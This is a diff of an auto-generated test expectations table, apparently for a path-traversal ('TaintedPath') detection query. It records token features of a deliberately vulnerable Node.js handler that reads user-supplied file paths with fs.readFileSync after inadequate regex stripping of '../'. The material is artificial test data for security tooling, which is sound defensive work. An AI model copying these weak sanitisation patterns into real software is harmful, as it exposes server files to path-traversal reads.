pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | exceptional return of fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | exceptional return of fs.read ... /, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | exceptional return of fs.read ... /, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | exceptional return of fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | exceptional return of fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | fs.read ... /, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | fs.read ... /, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6561,6 +65498,17 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:191:13:191:91 | fs.read ... /, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:191:16:191:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:16:191:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:16:191:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:16:191:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:16:191:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:29:191:36 | "prefix" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:29:191:36 | "prefix" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:29:191:36 | "prefix" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:29:191:36 | "prefix" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:29:191:36 | "prefix" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:29:191:36 | "prefix" | stringConcatenatedWith | -endpoint- pathModule.normalize().replace() | | autogenerated/TaintedPath/TaintedPath.js:191:29:191:90 | "prefix ... +/, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:191:29:191:90 | "prefix ... +/, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:191:29:191:90 | "prefix ... +/, '') | calleeImports | fs | @@ -6570,6 +65518,47 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:191:29:191:90 | "prefix ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:191:29:191:90 | "prefix ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:191:29:191:90 | "prefix ... +/, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:49 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:49 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:49 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:49 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:49 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:59 | pathModule.normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:59 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:59 | pathModule.normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:59 | pathModule.normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:59 | pathModule.normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:65 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:73 | pathMod ... replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:73 | pathMod ... replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:73 | pathMod ... replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:73 | pathMod ... replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:73 | pathMod ... replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | exceptional return of pathMod ... +/, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | exceptional return of pathMod ... +/, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | exceptional return of pathMod ... +/, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | exceptional return of pathMod ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | exceptional return of pathMod ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | pathMod ... +/, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | pathMod ... +/, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | pathMod ... +/, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | pathMod ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | pathMod ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:40:191:90 | pathMod ... +/, '') | stringConcatenatedWith | 'prefix' -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:191:51:191:59 | normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:51:191:59 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:51:191:59 | normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:51:191:59 | normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:51:191:59 | normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:191:61:191:64 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/TaintedPath.js:191:61:191:64 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:191:61:191:64 | path | calleeImports | path | @@ -6579,6 +65568,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:191:61:191:64 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:191:61:191:64 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:191:61:191:64 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:191:67:191:73 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:67:191:73 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:67:191:73 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:67:191:73 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:67:191:73 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:191:75:191:85 | /(\\.\\.\\/)+/ | CalleeFlexibleAccessPath | pathModule.normalize().replace | | autogenerated/TaintedPath/TaintedPath.js:191:75:191:85 | /(\\.\\.\\/)+/ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:191:75:191:85 | /(\\.\\.\\/)+/ | calleeImports | path | @@ -6595,6 +65589,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:191:88:191:89 | '' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | | autogenerated/TaintedPath/TaintedPath.js:191:88:191:89 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:191:88:191:89 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:5 | res | enclosingFunctionName | http.createServer#functionalargument | 